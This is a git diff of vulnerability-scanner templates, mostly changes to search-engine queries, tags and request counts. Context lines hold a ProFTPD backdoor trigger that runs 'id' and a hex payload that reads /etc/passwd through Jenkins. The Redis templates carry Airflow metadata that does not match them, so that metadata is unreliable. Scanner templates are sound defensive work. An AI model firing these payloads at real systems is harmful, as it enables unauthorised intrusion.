diff --git a/http/vulnerabilities/huatian/huatian-oa-sqli.yaml b/http/vulnerabilities/huatian/huatian-oa-sqli.yaml index 37bed4c845..39f8e0c6ae 100644 --- a/http/vulnerabilities/huatian/huatian-oa-sqli.yaml +++ b/http/vulnerabilities/huatian/huatian-oa-sqli.yaml @@ -10,7 +10,8 @@ info: - https://blog.csdn.net/qq_41617034/article/details/124305120 metadata: verified: true - fofa-query: app="华天动力-OA8000" + max-request: 1 + fofa-query: "app=\"华天动力-OA8000\"" tags: huatian,oa,sqli http: diff --git a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml index 211516606a..4714902deb 100644 --- a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml +++ b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-2032163853 + product: jorani + vendor: jorani + fofa-query: icon_hash=-2032163853 tags: packetstorm,jorani,benjamin,xss http: diff --git a/http/vulnerabilities/kkfileview-ssrf.yaml b/http/vulnerabilities/kkfileview-ssrf.yaml index 2ab25a38d4..81498d7d44 100644 --- a/http/vulnerabilities/kkfileview-ssrf.yaml +++ b/http/vulnerabilities/kkfileview-ssrf.yaml @@ -16,8 +16,13 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: app="kkFileView" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - app="kkFileView" + - app="kkfileview" + - body="kkfileview" tags: ssrf,kkfileview,keking http: diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index c8dc14a1bb..3f4fe18691 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: product="Array-VPN" - max-request: 1 verified: true + max-request: 1 + fofa-query: product="Array-VPN" tags: lfi,vpn,arrayvpn http: diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml index 098c30ca5d..aa7d6747cb 100644 --- a/http/vulnerabilities/other/cerio-dt-rce.yaml +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -11,8 +11,8 @@ info: - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N" tags: cerio,rce diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index 5ff933c1fa..23ee4528d7 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -10,9 +10,9 @@ info: - https://github.com/wy876/POC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md metadata: verified: true - fofa-query: title="EasyCVR" + max-request: 2 + fofa-query: "title=\"EasyCVR\"" tags: unauth,easycvr,misconfig - flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/other/microweber-xss.yaml b/http/vulnerabilities/other/microweber-xss.yaml index abe1afde09..29cfbebd11 100644 --- a/http/vulnerabilities/other/microweber-xss.yaml +++ b/http/vulnerabilities/other/microweber-xss.yaml @@ -14,7 +14,14 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + product: microweber + vendor: microweber + fofa-query: + - icon_hash=780351152 + - body="microweber" tags: microweber,xss,oss http: diff --git a/http/vulnerabilities/other/pmb-xss.yaml b/http/vulnerabilities/other/pmb-xss.yaml index a52764e0f3..1477a6faa4 100644 --- a/http/vulnerabilities/other/pmb-xss.yaml +++ b/http/vulnerabilities/other/pmb-xss.yaml @@ -15,7 +15,14 @@ info: metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:1469328760 + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + product: pmb + vendor: sigb + fofa-query: + - icon_hash=1469328760 + - body="pmb group" tags: xss,pmb,cms http: diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index d21270d655..bd33cca147 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -10,8 +10,8 @@ info: - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html - https://www.exploit-db.com/exploits/51910 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="Quick.Cms v6.7" tags: packetstorm,quickcms,sqli,cms diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index 3fbbda7fe7..9373ba2c4d 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -10,7 +10,8 @@ info: - https://github.com/wy876/POC/blob/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2.md metadata: verified: true - fofa-query: title="Tenda | LOGIN" && country="CN" + max-request: 1 + fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\"" tags: tendat,exposure,config http: diff --git a/http/vulnerabilities/other/tikiwiki-xss.yaml b/http/vulnerabilities/other/tikiwiki-xss.yaml index b44bbe9ed9..0907454346 100644 --- a/http/vulnerabilities/other/tikiwiki-xss.yaml +++ b/http/vulnerabilities/other/tikiwiki-xss.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 2 shodan-query: http.html:"tiki wiki" + product: tikiwiki_cms\/groupware + vendor: tiki + fofa-query: body="tiki wiki" tags: edb,xss,tikiwiki,packetstorm,acketstorm http: diff --git a/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml index aea6f3692e..6ff80954f3 100644 --- a/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml @@ -12,8 +12,9 @@ info: max-request: 2 framework: prestashop shodan-query: "http.component:\"prestashop\"" + product: ap_pagebuilder + vendor: apollotheme tags: intrusive,file-upload,blocktestimonial,prestashop - variables: filename: '{{rand_base(7, "abc")}}' data: '{{rand_base(6, "abc")}}' diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml index 3972c20e34..6c809f05d2 100644 --- a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -8,12 +8,13 @@ info: - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ - https://dh42.com/blog/prestashop-security/ metadata: - framework: prestashop - shodan-query: http.component:"prestashop" verified: true - max-request: 1 + max-request: 2 + framework: prestashop + shodan-query: "http.component:\"prestashop\"" + product: ap_pagebuilder + vendor: apollotheme tags: intrusive,file-upload,cartabandonmentpro,prestashop - variables: filename: '{{rand_base(7, "abc")}}' title: '{{rand_base(7, "abc")}}' diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index 4cb8368e6a..aa9ba34bb3 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 3 fofa-query: app="泛微-EOffice" - tags: weaver,e-office,oa,intrusive,rce,intrusive,fileupload + tags: weaver,e-office,oa,intrusive,rce,fileupload variables: filename: "{{to_lower(rand_base(5))}}" diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index fbf534f6bd..135ba73734 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -10,7 +10,7 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 30 + max-request: 32 tags: wordpress,backup http: diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index d96109c385..e4ee7e788f 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -10,7 +10,7 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 + max-request: 2 tags: wordpress,wp-plugin,xss,wordfence flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 0775781c9c..0e2e13a451 100644 --- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp,wpscan,intrusive flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml index 0a87565389..e7b5b216ab 100644 --- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 + max-request: 2 tags: wp-plugin,wp,edb,wpscan,wordpress,xss flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 92b5714c5b..6fa48097da 100644 --- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wpscan,wordpress,xss,wp-plugin flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml index c234442498..322ce7a569 100644 --- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -12,7 +12,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: xss,wp-plugin,packetstorm,wordpress flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml index 8674f3db13..00c20bfa3d 100644 --- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp-plugin,edb flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml index 8e71f846a2..62b6671448 100644 --- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp-plugin flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml index 458876ca6b..bddb84aacb 100644 --- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wp-plugin,edb,wordpress,xss flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index da31152e66..3d8caaaea1 100644 --- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: xss,wp-plugin,edb,wordpress flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml index 07d7a66adf..76aae56907 100644 --- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: edb,wordpress,xss,wp-plugin flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 01a3211a3b..a65d1374c7 100644 --- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -12,7 +12,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp-plugin,edb flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml index e671fc582f..475cac7c9f 100644 --- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -11,7 +11,7 @@ info: - https://packetstormsecurity.com/files/161576/ metadata: verified: true - max-request: 1 + max-request: 2 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-user-enum.yaml b/http/vulnerabilities/wordpress/wp-user-enum.yaml index 05f5bece68..ee398dd389 100644 --- a/http/vulnerabilities/wordpress/wp-user-enum.yaml +++ b/http/vulnerabilities/wordpress/wp-user-enum.yaml @@ -21,7 +21,10 @@ info: max-request: 2 vendor: wordpress product: wordpress - shodan-query: http.component:"WordPress" + shodan-query: + - http.component:"WordPress" + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" tags: cve2017,cve,wordpress,wp,edb http: diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml index 2275724aee..0f09665642 100644 --- a/javascript/backdoor/proftpd-backdoor.yaml +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -10,9 +10,9 @@ info: - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/ metadata: - shodan-query: product:"ProFTPD" + max-request: 1 + shodan-query: "product:\"ProFTPD\"" tags: js,network,proftpd,ftp,backdoor - javascript: - code: | const data = ["HELP ACIDBITCHEZ\n", "id"]; diff --git a/javascript/cves/2012/CVE-2012-2122.yaml b/javascript/cves/2012/CVE-2012-2122.yaml index f303e06e97..4e94765daa 100644 --- a/javascript/cves/2012/CVE-2012-2122.yaml +++ b/javascript/cves/2012/CVE-2012-2122.yaml @@ -17,16 +17,18 @@ info: cvss-score: 5.1 cve-id: CVE-2012-2122 cwe-id: CWE-287 - epss-score: 0.97019 - epss-percentile: 0.99732 + epss-score: 0.9681 + epss-percentile: 0.99685 cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 vendor: oracle product: mysql - shodan-query: product:"MySQL" - tags: cve,cve2012,js,enum,network,mssql,fuzz - + shodan-query: + - "product:\"MySQL\"" + - product:"mysql" + tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle javascript: - code: | const mysql = require('nuclei/mysql'); diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml index 7d32efc03f..1151cddc0f 100644 --- a/javascript/cves/2019/CVE-2019-9193.yaml +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 1 + shodan-query: "product:\"PostgreSQL\"" tags: cve,cve2018,js,network,postgresql,intrusive - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/cves/2020/CVE-2020-7247.yaml b/javascript/cves/2020/CVE-2020-7247.yaml index 0ee8c36b70..6a090b2ed2 100644 --- a/javascript/cves/2020/CVE-2020-7247.yaml +++ b/javascript/cves/2020/CVE-2020-7247.yaml @@ -24,11 +24,10 @@ info: epss-percentile: 0.9998 cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:* metadata: - max-request: 2 + max-request: 1 vendor: openbsd product: opensmtpd - tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev - + tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd javascript: - code: | const smtp = require('nuclei/smtp'); diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index c83d8c7995..87aebf4ff8 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -29,7 +29,7 @@ info: verified: true vendor: vmware product: aria_operations_for_networks - tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize + tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023 variables: keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 926ccba63a..f0e9996001 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -26,7 +26,10 @@ info: max-request: 1 vendor: apache product: activemq - shodan-query: product:"ActiveMQ OpenWire Transport" + shodan-query: + - product:"ActiveMQ OpenWire Transport" + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev variables: prefix: "1f00000000000000000001010042" diff --git a/javascript/cves/2023/CVE-2023-48795.yaml b/javascript/cves/2023/CVE-2023-48795.yaml index 497864c2cf..082fa0bcb0 100644 --- a/javascript/cves/2023/CVE-2023-48795.yaml +++ b/javascript/cves/2023/CVE-2023-48795.yaml @@ -27,9 +27,11 @@ info: max-request: 1 vendor: openbsd product: openssh - shodan-query: product:"OpenSSH" - tags: cve,cve2023,packetstorm,seclists,js,ssh,network,passive - + shodan-query: + - product:"OpenSSH" + - product:"openssh" + - cpe:"cpe:2.3:a:openbsd:openssh" + tags: cve,cve2023,packetstorm,seclists,js,ssh,network,passive,openbsd javascript: - code: | const m = require("nuclei/ssh"); diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index ef4476d1a7..09e4964c87 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -24,9 +24,13 @@ info: max-request: 1 vendor: jenkins product: jenkins - shodan-query: "product:\"Jenkins\"" + shodan-query: + - "product:\"Jenkins\"" + - cpe:"cpe:2.3:a:jenkins:jenkins" + - http.favicon.hash:81586312 + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: cve,cve2024,lfi,rce,jenkins,js - variables: payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" diff --git a/javascript/default-logins/redis-default-logins.yaml b/javascript/default-logins/redis-default-logins.yaml index b4d15c1ef7..dc7d3a7f10 100644 --- a/javascript/default-logins/redis-default-logins.yaml +++ b/javascript/default-logins/redis-default-logins.yaml @@ -8,9 +8,20 @@ info: Redis service was accessed with easily guessed credentials. metadata: max-request: 6 - shodan-query: product:"redis" + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" tags: js,redis,default-login,network - javascript: - pre-condition: | isPortOpen(Host,Port) diff --git a/javascript/detection/samba-detect.yaml b/javascript/detection/samba-detect.yaml index ddde28229d..bfdff123ae 100644 --- a/javascript/detection/samba-detect.yaml +++ b/javascript/detection/samba-detect.yaml @@ -9,8 +9,9 @@ info: metadata: max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,samba,detect,linux - javascript: - code: | let m = require("nuclei/smb"); diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 358c270263..3f4f071528 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -8,7 +8,8 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_hostname.rb metadata: verfied: true - shodan-query: product:"Check Point Firewall" + shodan-query: "product:\"Check Point Firewall\"" + max-request: 1 tags: js,network,firewall,checkpoint,enum javascript: diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index aae2507b33..4db827a462 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://github.com/sjhilt/Nmap-NSEs/blob/master/minecraft-info.nse metadata: + verified: true max-request: 1 shodan-query: product:"Minecraft" - verified: true tags: js,network,minecraft,enum - javascript: - code: | let data = "fe01" diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 687207551e..7a48346b80 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 21 shodan-query: "port:3306" - tags: js,mysql,default-login,network,fuzz + tags: js,mysql,default-login,network,fuzz,enum javascript: - pre-condition: | diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml index 3d3c169f02..9cb991cce2 100644 --- a/javascript/enumeration/mysql/mysql-info.yaml +++ b/javascript/enumeration/mysql/mysql-info.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: "port:3306" - tags: js,mssql,network + tags: js,mssql,network,enum javascript: - code: | var m = require("nuclei/mysql"); diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml index 70df51efb9..adb38586a0 100644 --- a/javascript/enumeration/pgsql/pgsql-default-db.yaml +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-database-name metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 40 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml index 39afac42e9..878ab89f27 100644 --- a/javascript/enumeration/pgsql/pgsql-file-read.yaml +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml index b0803bd40d..e048b7896e 100644 --- a/javascript/enumeration/pgsql/pgsql-list-database.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -10,10 +10,10 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml index ff99680e81..b038eff825 100644 --- a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -11,10 +11,10 @@ info: - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml index 176dfd9d72..ed6f321d8a 100644 --- a/javascript/enumeration/pgsql/pgsql-list-users.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml index cbbbdccf98..08714c8d32 100644 --- a/javascript/enumeration/pgsql/pgsql-version-detect.yaml +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-version metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml index e86f426477..510a59f3be 100644 --- a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml +++ b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/pop3-capabilities.html metadata: + verified: true max-request: 1 shodan-query: "port:110" - verified: true tags: js,network,pop3,enum - javascript: - code: | let data = "CAPA\r\n" diff --git a/javascript/enumeration/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml index fbd62fb967..8ab3106dbd 100644 --- a/javascript/enumeration/redis/redis-info.yaml +++ b/javascript/enumeration/redis/redis-info.yaml @@ -10,9 +10,20 @@ info: - https://nmap.org/nsedoc/scripts/redis-info.html metadata: max-request: 1 - shodan-query: product:"redis" - tags: js,redis,network - + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: 